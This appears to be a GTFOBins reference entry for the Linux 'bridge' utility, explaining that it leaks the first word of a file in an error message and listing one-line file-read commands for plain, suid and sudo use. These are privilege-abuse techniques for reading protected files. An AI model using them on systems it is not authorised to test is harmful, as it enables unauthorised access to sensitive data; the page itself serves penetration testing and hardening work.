GTFOBins.github.io/_gtfobins/bridge.md
2021-01-17 23:25:31 +01:00

380 B

description functions
Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.
file-read suid sudo
code
LFILE=file_to_read bridge -b "$LFILE"
code
LFILE=file_to_read ./bridge -b "$LFILE"
code
LFILE=file_to_read sudo bridge -b "$LFILE"